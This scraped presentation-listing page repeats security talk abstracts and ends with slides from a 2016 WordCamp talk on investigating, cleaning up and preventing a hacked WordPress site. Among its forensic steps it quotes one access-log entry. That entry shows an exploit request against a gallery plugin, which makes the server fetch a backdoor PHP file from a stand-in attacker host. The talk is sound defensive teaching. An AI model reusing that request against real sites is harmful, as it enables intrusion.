How we do it better than IR firms. Learn what you need to know to catch commoditized malware to advanced malware. Ask a Blue Team Ninja, Logoholic and Malware Archaeologist how we do ti.
Logs, Logs, Logs - What you need to know to catch a thiefMichael Gough
This will help you get started at Windows logging. What to Enable, Configure, Gather and Harvest to start catching hackers in their tracks.
The Windows Logging Cheat Sheet and SEXY Six Event ID's you MUST monitor and alert on.
Have you ever wonder if the access to your cloud kingdom is secure? Have you ever thought how cyber criminals are hunting for your secrets? How can you be sure that your secret is not “mistakenly” available to the public? In my presentation I’m going to present you hackish methods used by cyber criminals to find access keys in the public Internet. How can Shannon Entropy help you? During the presentation, I’ll release my own scaners to search AWS and Azure space and in the end I will demonstrate my own tool to analyze big amounts of data in search for sensitive data. Lots of demos, technical stuff and educating moral for unaware specialists in the end. It’s gonna be fun!
A look at the types malicious artifacts from Advanced and Commodity attacks, what unique artifacts to look for and how logging caught them for a Windows environment and how LOG-MD can help.
MalwareArchaeology.com
LOG-MD.com
How we do it better than IR firms. Learn what you need to know to catch commoditized malware to advanced malware. Ask a Blue Team Ninja, Logoholic and Malware Archaeologist how we do ti.
Logs, Logs, Logs - What you need to know to catch a thiefMichael Gough
This will help you get started at Windows logging. What to Enable, Configure, Gather and Harvest to start catching hackers in their tracks.
The Windows Logging Cheat Sheet and SEXY Six Event ID's you MUST monitor and alert on.
Have you ever wonder if the access to your cloud kingdom is secure? Have you ever thought how cyber criminals are hunting for your secrets? How can you be sure that your secret is not “mistakenly” available to the public? In my presentation I’m going to present you hackish methods used by cyber criminals to find access keys in the public Internet. How can Shannon Entropy help you? During the presentation, I’ll release my own scaners to search AWS and Azure space and in the end I will demonstrate my own tool to analyze big amounts of data in search for sensitive data. Lots of demos, technical stuff and educating moral for unaware specialists in the end. It’s gonna be fun!
A look at the types malicious artifacts from Advanced and Commodity attacks, what unique artifacts to look for and how logging caught them for a Windows environment and how LOG-MD can help.
MalwareArchaeology.com
LOG-MD.com
Windows IR made easier and faster Find the head of the snake using Logs, AutoRuns, Large Registry Keys, Locked Files, IP/WhoIs and Netflow
Malware Archaeology
LOG-MD
BSidesNOLA
Secure Yourself, Practice what we preach - BSides Austin 2015Michael Gough
We all practice Information Security, but do we practice what we preach? Do we do what we ask of our employees and clients to our own, family and work computers?
Have you ever wonder if the access to your cloud kingdom is secure? Have you ever thought how cyber criminals are hunting for your secrets? How can you be sure that your secret is not “mistakenly” available to the public? In my presentation I’m going to present you hackish methods used by cyber criminals to find access keys in the public Internet. How can Shannon Entropy help you? During the presentation, I’ll release my own scaners to search AWS and Azure space and in the end I will demonstrate my own tool to analyze big amounts of data in search for sensitive data. Lots of demos, technical stuff and educating moral for unaware specialists in the end. It’s gonna be fun!
Additional materials: https://www.securing.biz/en/seven-step-guide-to-securing-your-aws-kingdom/index.html
Brute Force - Lior Rotkovitch - f5 SIRT v5.pdfLior Rotkovitch
Part of F5 mitigations series
Brute force on apps is on the rise
Will become WBT @ F5U
Conclusion:
Internet brute force can go undetected and is a serious threat to applications
F5 owns the largest set of options to detect and prevent application brute force
Ethical hacking is the process by which an authorised individual uses the methods and techniques of an adversary (hacker) with the intention of identifying vulnerabilities before an organisation is compromised. In order to understand how an attacker identifies, targets and compromises a system, this workshop will begin with a case study—but this won’t be a boring lecture on what went wrong. This will be a live-hack demo where you will experience the process from first encounter through full network access.
This presentation was delivered at RSA Asia Pacific and Japan in Singapore on the 16th July 2019.
Attackers don’t just search for technology vulnerabilities, they take the easiest path and find the human vulnerabilities. Drive by web attacks, targeted spear phishing, and more are commonplace today with the goal of delivering custom malware. In a world where delivering custom advanced malware that handily evades signature and blacklisting approaches, and does not depend on application software vulnerabilities, how do we understand when are environments are compromised? What are the telltale signs that compromise activity has started, and how can we move to arrest a compromise in progress before the attacker laterally moves and reinforces their position? The penetration testing community knows these signs and artifacts of advanced malware presence, and it is up to us to help educate defenders on what to look for.
Windows IR made easier and faster Find the head of the snake using Logs, AutoRuns, Large Registry Keys, Locked Files, IP/WhoIs and Netflow
Malware Archaeology
LOG-MD
BSidesNOLA
Secure Yourself, Practice what we preach - BSides Austin 2015Michael Gough
We all practice Information Security, but do we practice what we preach? Do we do what we ask of our employees and clients to our own, family and work computers?
Have you ever wonder if the access to your cloud kingdom is secure? Have you ever thought how cyber criminals are hunting for your secrets? How can you be sure that your secret is not “mistakenly” available to the public? In my presentation I’m going to present you hackish methods used by cyber criminals to find access keys in the public Internet. How can Shannon Entropy help you? During the presentation, I’ll release my own scaners to search AWS and Azure space and in the end I will demonstrate my own tool to analyze big amounts of data in search for sensitive data. Lots of demos, technical stuff and educating moral for unaware specialists in the end. It’s gonna be fun!
Additional materials: https://www.securing.biz/en/seven-step-guide-to-securing-your-aws-kingdom/index.html
Brute Force - Lior Rotkovitch - f5 SIRT v5.pdfLior Rotkovitch
Part of F5 mitigations series
Brute force on apps is on the rise
Will become WBT @ F5U
Conclusion:
Internet brute force can go undetected and is a serious threat to applications
F5 owns the largest set of options to detect and prevent application brute force
Ethical hacking is the process by which an authorised individual uses the methods and techniques of an adversary (hacker) with the intention of identifying vulnerabilities before an organisation is compromised. In order to understand how an attacker identifies, targets and compromises a system, this workshop will begin with a case study—but this won’t be a boring lecture on what went wrong. This will be a live-hack demo where you will experience the process from first encounter through full network access.
This presentation was delivered at RSA Asia Pacific and Japan in Singapore on the 16th July 2019.
Attackers don’t just search for technology vulnerabilities, they take the easiest path and find the human vulnerabilities. Drive by web attacks, targeted spear phishing, and more are commonplace today with the goal of delivering custom malware. In a world where delivering custom advanced malware that handily evades signature and blacklisting approaches, and does not depend on application software vulnerabilities, how do we understand when are environments are compromised? What are the telltale signs that compromise activity has started, and how can we move to arrest a compromise in progress before the attacker laterally moves and reinforces their position? The penetration testing community knows these signs and artifacts of advanced malware presence, and it is up to us to help educate defenders on what to look for.
Talk at TYPO3 Conference 2016 in Bologna/Italy. Basic insights into hacking websites with SqlMap and BeEF XSS and considerations to prevent that. Screencasts of SQLi and XSS at https://www.youtube.com/watch?v=VIGVlmaKqxY & https://www.youtube.com/watch?v=WBDWWv5zdUQ
Have you ever run a vulnerability scanner and thought "Okay...so now what?". This talk explores how to go beyond running a vulnerability scanner by walking through a penetration test with examples and tips along the way.
Malware Analysis 101: N00b to Ninja in 60 Minutes at BSidesDC on October 19, ...grecsl
Knowing how to perform basic malware analysis can go a long way in helping infosec analysts do some basic triage to either crush the mundane or recognize when its time to pass the more serious samples on to the the big boys. This presentation covers several analysis environment options and the three quick steps that allows almost anyone with a general technical background to go from n00b to ninja (;)) in no time. Well … maybe not a "ninja" per se but the closing does address follow-on resources on the cheap for those wanting to dive deeper into the dark world of malware analysis.
All These Sophisticated Attacks, Can We Really Detect Them - PDFMichael Gough
Can we really detect advanced attacks? This session walks through 4 published attacks to point out what we can learn and detect using malware management, some cheat sheets and Security 101. LOG-MD, FILE-MD, Malware Archaeology
2023 NCIT: Introduction to Intrusion DetectionAPNIC
APNIC Senior Security Specialist Adli Wahid presents an Introduction to Intrusion Detection at the 2023 NCIT, held in Suva, Fiji from 17 to 18 August 2023.
When your security tools fail you, and what you can do about it. This discusses actual tool fail backgrounds, what failed and what you can do to detect and/or mitigate the issues(s) another way
HackerHurricane
MalwareArchaeology
Malware Archaeology
LOG-MD
Cambodia CERT Seminar: Incident response for ransomeware attacksAPNIC
Senior Security Specialist Adli Wahid presents on incident response for ransomeware attacks at the Cambodia CERT Seminar, held online on 13 August 2021.
Magento Live UK Nexcess Performance & Security SessionNexcess.net LLC
Your site's security and performance directly correlates to order volume. A tuned and secure Magento install can instantly mean more sales and the converse is also true. This session is meant to give you an overview of the importance of security and performance for your e-commerce site as well as provide steps to make Magento perform as your business grows.
Software Engineering, Software Consulting, Tech Lead.
Spring Boot, Spring Cloud, Spring Core, Spring JDBC, Spring Security,
Spring Transaction, Spring MVC,
Log4j, REST/SOAP WEB-SERVICES.
Advanced Flow Concepts Every Developer Should KnowPeter Caitens
Tim Combridge from Sensible Giraffe and Salesforce Ben presents some important tips that all developers should know when dealing with Flows in Salesforce.
Designing for Privacy in Amazon Web ServicesKrzysztofKkol1
Data privacy is one of the most critical issues that businesses face. This presentation shares insights on the principles and best practices for ensuring the resilience and security of your workload.
Drawing on a real-life project from the HR industry, the various challenges will be demonstrated: data protection, self-healing, business continuity, security, and transparency of data processing. This systematized approach allowed to create a secure AWS cloud infrastructure that not only met strict compliance rules but also exceeded the client's expectations.
Experience our free, in-depth three-part Tendenci Platform Corporate Membership Management workshop series! In Session 1 on May 14th, 2024, we began with an Introduction and Setup, mastering the configuration of your Corporate Membership Module settings to establish membership types, applications, and more. Then, on May 16th, 2024, in Session 2, we focused on binding individual members to a Corporate Membership and Corporate Reps, teaching you how to add individual members and assign Corporate Representatives to manage dues, renewals, and associated members. Finally, on May 28th, 2024, in Session 3, we covered questions and concerns, addressing any queries or issues you may have.
For more Tendenci AMS events, check out www.tendenci.com/events
How Recreation Management Software Can Streamline Your Operations.pptxwottaspaceseo
Recreation management software streamlines operations by automating key tasks such as scheduling, registration, and payment processing, reducing manual workload and errors. It provides centralized management of facilities, classes, and events, ensuring efficient resource allocation and facility usage. The software offers user-friendly online portals for easy access to bookings and program information, enhancing customer experience. Real-time reporting and data analytics deliver insights into attendance and preferences, aiding in strategic decision-making. Additionally, effective communication tools keep participants and staff informed with timely updates. Overall, recreation management software enhances efficiency, improves service delivery, and boosts customer satisfaction.
Strategies for Successful Data Migration Tools.pptxvarshanayak241
Data migration is a complex but essential task for organizations aiming to modernize their IT infrastructure and leverage new technologies. By understanding common challenges and implementing these strategies, businesses can achieve a successful migration with minimal disruption. Data Migration Tool like Ask On Data play a pivotal role in this journey, offering features that streamline the process, ensure data integrity, and maintain security. With the right approach and tools, organizations can turn the challenge of data migration into an opportunity for growth and innovation.
A Comprehensive Look at Generative AI in Retail App Testing.pdfkalichargn70th171
Traditional software testing methods are being challenged in retail, where customer expectations and technological advancements continually shape the landscape. Enter generative AI—a transformative subset of artificial intelligence technologies poised to revolutionize software testing.
Globus Connect Server Deep Dive - GlobusWorld 2024Globus
We explore the Globus Connect Server (GCS) architecture and experiment with advanced configuration options and use cases. This content is targeted at system administrators who are familiar with GCS and currently operate—or are planning to operate—broader deployments at their institution.
Into the Box Keynote Day 2: Unveiling amazing updates and announcements for modern CFML developers! Get ready for exciting releases and updates on Ortus tools and products. Stay tuned for cutting-edge innovations designed to boost your productivity.
Climate Science Flows: Enabling Petabyte-Scale Climate Analysis with the Eart...Globus
The Earth System Grid Federation (ESGF) is a global network of data servers that archives and distributes the planet’s largest collection of Earth system model output for thousands of climate and environmental scientists worldwide. Many of these petabyte-scale data archives are located in proximity to large high-performance computing (HPC) or cloud computing resources, but the primary workflow for data users consists of transferring data, and applying computations on a different system. As a part of the ESGF 2.0 US project (funded by the United States Department of Energy Office of Science), we developed pre-defined data workflows, which can be run on-demand, capable of applying many data reduction and data analysis to the large ESGF data archives, transferring only the resultant analysis (ex. visualizations, smaller data files). In this talk, we will showcase a few of these workflows, highlighting how Globus Flows can be used for petabyte-scale climate analysis.
Multiple Your Crypto Portfolio with the Innovative Features of Advanced Crypt...Hivelance Technology
Cryptocurrency trading bots are computer programs designed to automate buying, selling, and managing cryptocurrency transactions. These bots utilize advanced algorithms and machine learning techniques to analyze market data, identify trading opportunities, and execute trades on behalf of their users. By automating the decision-making process, crypto trading bots can react to market changes faster than human traders
Hivelance, a leading provider of cryptocurrency trading bot development services, stands out as the premier choice for crypto traders and developers. Hivelance boasts a team of seasoned cryptocurrency experts and software engineers who deeply understand the crypto market and the latest trends in automated trading, Hivelance leverages the latest technologies and tools in the industry, including advanced AI and machine learning algorithms, to create highly efficient and adaptable crypto trading bots
How Does XfilesPro Ensure Security While Sharing Documents in Salesforce?XfilesPro
Worried about document security while sharing them in Salesforce? Fret no more! Here are the top-notch security standards XfilesPro upholds to ensure strong security for your Salesforce documents while sharing with internal or external people.
To learn more, read the blog: https://www.xfilespro.com/how-does-xfilespro-make-document-sharing-secure-and-seamless-in-salesforce/
Your Digital Assistant.
Making complex approach simple. Straightforward process saves time. No more waiting to connect with people that matter to you. Safety first is not a cliché - Securely protect information in cloud storage to prevent any third party from accessing data.
Would you rather make your visitors feel burdened by making them wait? Or choose VizMan for a stress-free experience? VizMan is an automated visitor management system that works for any industries not limited to factories, societies, government institutes, and warehouses. A new age contactless way of logging information of visitors, employees, packages, and vehicles. VizMan is a digital logbook so it deters unnecessary use of paper or space since there is no requirement of bundles of registers that is left to collect dust in a corner of a room. Visitor’s essential details, helps in scheduling meetings for visitors and employees, and assists in supervising the attendance of the employees. With VizMan, visitors don’t need to wait for hours in long queues. VizMan handles visitors with the value they deserve because we know time is important to you.
Feasible Features
One Subscription, Four Modules – Admin, Employee, Receptionist, and Gatekeeper ensures confidentiality and prevents data from being manipulated
User Friendly – can be easily used on Android, iOS, and Web Interface
Multiple Accessibility – Log in through any device from any place at any time
One app for all industries – a Visitor Management System that works for any organisation.
Stress-free Sign-up
Visitor is registered and checked-in by the Receptionist
Host gets a notification, where they opt to Approve the meeting
Host notifies the Receptionist of the end of the meeting
Visitor is checked-out by the Receptionist
Host enters notes and remarks of the meeting
Customizable Components
Scheduling Meetings – Host can invite visitors for meetings and also approve, reject and reschedule meetings
Single/Bulk invites – Invitations can be sent individually to a visitor or collectively to many visitors
VIP Visitors – Additional security of data for VIP visitors to avoid misuse of information
Courier Management – Keeps a check on deliveries like commodities being delivered in and out of establishments
Alerts & Notifications – Get notified on SMS, email, and application
Parking Management – Manage availability of parking space
Individual log-in – Every user has their own log-in id
Visitor/Meeting Analytics – Evaluate notes and remarks of the meeting stored in the system
Visitor Management System is a secure and user friendly database manager that records, filters, tracks the visitors to your organization.
"Secure Your Premises with VizMan (VMS) – Get It Now"
Large Language Models and the End of ProgrammingMatt Welsh
Talk by Matt Welsh at Craft Conference 2024 on the impact that Large Language Models will have on the future of software development. In this talk, I discuss the ways in which LLMs will impact the software industry, from replacing human software developers with AI, to replacing conventional software with models that perform reasoning, computation, and problem-solving.
Globus Compute wth IRI Workflows - GlobusWorld 2024Globus
As part of the DOE Integrated Research Infrastructure (IRI) program, NERSC at Lawrence Berkeley National Lab and ALCF at Argonne National Lab are working closely with General Atomics on accelerating the computing requirements of the DIII-D experiment. As part of the work the team is investigating ways to speedup the time to solution for many different parts of the DIII-D workflow including how they run jobs on HPC systems. One of these routes is looking at Globus Compute as a way to replace the current method for managing tasks and we describe a brief proof of concept showing how Globus Compute could help to schedule jobs and be a tool to connect compute at different facilities.
Providing Globus Services to Users of JASMIN for Environmental Data AnalysisGlobus
JASMIN is the UK’s high-performance data analysis platform for environmental science, operated by STFC on behalf of the UK Natural Environment Research Council (NERC). In addition to its role in hosting the CEDA Archive (NERC’s long-term repository for climate, atmospheric science & Earth observation data in the UK), JASMIN provides a collaborative platform to a community of around 2,000 scientists in the UK and beyond, providing nearly 400 environmental science projects with working space, compute resources and tools to facilitate their work. High-performance data transfer into and out of JASMIN has always been a key feature, with many scientists bringing model outputs from supercomputers elsewhere in the UK, to analyse against observational or other model data in the CEDA Archive. A growing number of JASMIN users are now realising the benefits of using the Globus service to provide reliable and efficient data movement and other tasks in this and other contexts. Further use cases involve long-distance (intercontinental) transfers to and from JASMIN, and collecting results from a mobile atmospheric radar system, pushing data to JASMIN via a lightweight Globus deployment. We provide details of how Globus fits into our current infrastructure, our experience of the recent migration to GCSv5.4, and of our interest in developing use of the wider ecosystem of Globus services for the benefit of our user community.
Understanding Globus Data Transfers with NetSageGlobus
NetSage is an open privacy-aware network measurement, analysis, and visualization service designed to help end-users visualize and reason about large data transfers. NetSage traditionally has used a combination of passive measurements, including SNMP and flow data, as well as active measurements, mainly perfSONAR, to provide longitudinal network performance data visualization. It has been deployed by dozens of networks world wide, and is supported domestically by the Engagement and Performance Operations Center (EPOC), NSF #2328479. We have recently expanded the NetSage data sources to include logs for Globus data transfers, following the same privacy-preserving approach as for Flow data. Using the logs for the Texas Advanced Computing Center (TACC) as an example, this talk will walk through several different example use cases that NetSage can answer, including: Who is using Globus to share data with my institution, and what kind of performance are they able to achieve? How many transfers has Globus supported for us? Which sites are we sharing the most data with, and how is that changing over time? How is my site using Globus to move data internally, and what kind of performance do we see for those transfers? What percentage of data transfers at my institution used Globus, and how did the overall data transfer performance compare to the Globus users?
In 2015, I used to write extensions for Joomla, WordPress, phpBB3, etc and I ...Juraj Vysvader
In 2015, I used to write extensions for Joomla, WordPress, phpBB3, etc and I didn't get rich from it but it did have 63K downloads (powered possible tens of thousands of websites).
Unleash Unlimited Potential with One-Time Purchase
BoxLang is more than just a language; it's a community. By choosing a Visionary License, you're not just investing in your success, you're actively contributing to the ongoing development and support of BoxLang.
Post Mortem of a Hacked Website - Wordcamp Sunshine Coast 2016
1. Post-Mortem of a
Hacked Website
Presented By: Tim Butler – Conetix
WordCamp Sunshine Coast 2016
Twitter: @timbutler
2. Who Am I?
Tim Butler
Enterprise Manager – Conetix
● 5 years in the hosting industry
● Previous - IT Security Manager within Federal Government
● Using WordPress since 2005
● Clean-up 2-5 hacked websites a week
3. In this talk….
➔What happens when you’re hacked
➔Deep Analysis
➔Clean Up
➔Prevention
4. But before we start….
Prevention is better than the cure
Backup Backup Backup!
(and then take an other backup)
6. How do you know if you’ve been hacked?
• Used to be simple (but annoying) defacing
• Poor site performance
• Emails bouncing
• Google was nice enough to let you know
8. Why was I hacked?
• You probably weren’t targeted specifically
• DoS attacks
• Phishing
• Spam
• Bot to hack other sites
9. Why was I hacked?
Google discover over 100,000 infected sites
per month
100 billion estimated cost of cybercrime
10. So… I’ve been hacked
• Hackers want to have the system exploited
for as long as possible
• Many exploits avoid Google / Chrome to
remain undetected
• Obfuscated code
• Self morphing code
11. So… I’ve been hacked
Basically, it’s one big game of cat and mouse
Source: simpsons.wikia.com
17. Step1: Don’t Touch Anything
Treat it like a crime scene
You need to preserve the digital forensics
18. Step1: Don’t Touch Anything
• Webserver log files
• Server log files
• File timestamps
• Talk to your host!
Most important part is to find the point of origin
19. Step1: Don’t Touch Anything
If you need your website back up immediately,
restore your most recent backup to a new
hosting subscription and update DNS
25. Step 2: Forensic Analysis
Reality
• Lots of digging through log files
• Lots of referencing file modifications times
• Lots of low-level, tech work
27. Step 2: Forensic Analysis
Access Log Files
• First item to check
• Look for suspicious POST calls
• Looking for the result of the hack to start
with, not the cause
28. Step 2: Forensic Analysis
POST Calls
• Need to sort the good from the bad
grep POST access_log | wc -l
• 1,412 results
What to look for
Where to look for it
Quickly count the results
33. Step 2: Forensic Analysis
File Creation / Modification Times
• We know the malicious file is
wp-content/plugins/legit-looking/plugin/safefile.php
• Let’s look at the modification time:
ls –l safefile.php
-rw-r--r-- 1 fileowner filegroup 99424 Mar 23 2013
safefile.php
• Also check the creation time:
34. Step 2: Forensic Analysis
File Creation / Modification Times
• Also check the creation time:
ls –lc safefile.php
-rw-r--r-- 1 fileowner filegroup 99424 Apr 18 02:45
safefile.php
• Dates can be manipulated! Here’s were we need to search
35. Step 2: Forensic Analysis
Recheck Access Logs
grep “[18/Apr/2016:02:45” access_log
This may give us something like:
xxx.xxx.xxx.xxx - - [18/Apr/2016:02:45:00 +1000] "GET /wp-content/plugins/robo-
gallery/includes/rbs_gallery_ajax.php?function=file_put_contents(%22http%3A%2F%2F
hackerssite%2Fscripts%2Fsafefile.php%22) HTTP/1.1" 200 449954 "-" "Mozilla/5.0
(Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0“
40. Step 3: The Clean Up
• 10x as much work
If there’s no backups…
• Hackers love to leave backdoors to regain
access
41. Step 3: The Clean Up
Remove infected files
• Malicious files
• Look for other files
They can modify every other file in your site
42. Step 3: The Clean Up
Check for Database changes
• Inserted users
• Updated passwords/ privileges for non-
admin users
43. Step 3: The Clean Up
Cron Jobs
• Scheduled re-infections
• Check your web control panel / raw cron
44. Step 3: The Clean Up
RBL Blacklists
• If you were spamming, automated systems
notice
• Use an RBL lookup to check
- Senderbase (used by Telstra / Optus etc) don’t
allow you to automate scans
- Nor does Hotmail / Outlook / Office365 / Google
50. Step 4: Prevention
Keep your software up-to-date
• One gotcha to be aware of:
Paid Themes with Plugins
- may not auto update
- may require an active subscription
• Remove (don’t just disable) unused themes / plugins
51. Step 4: Prevention
Secure Passwords
• Unique password per site / login
• Use a password manager
• Length is more important than complexity
(12+ characters is good)
53. Step 4: Prevention
Server / Hosting Protection
• CloudFlare Pro / Web Application Firewall
• Limit each site to one user
• Don’t keep old directories / backups on the
server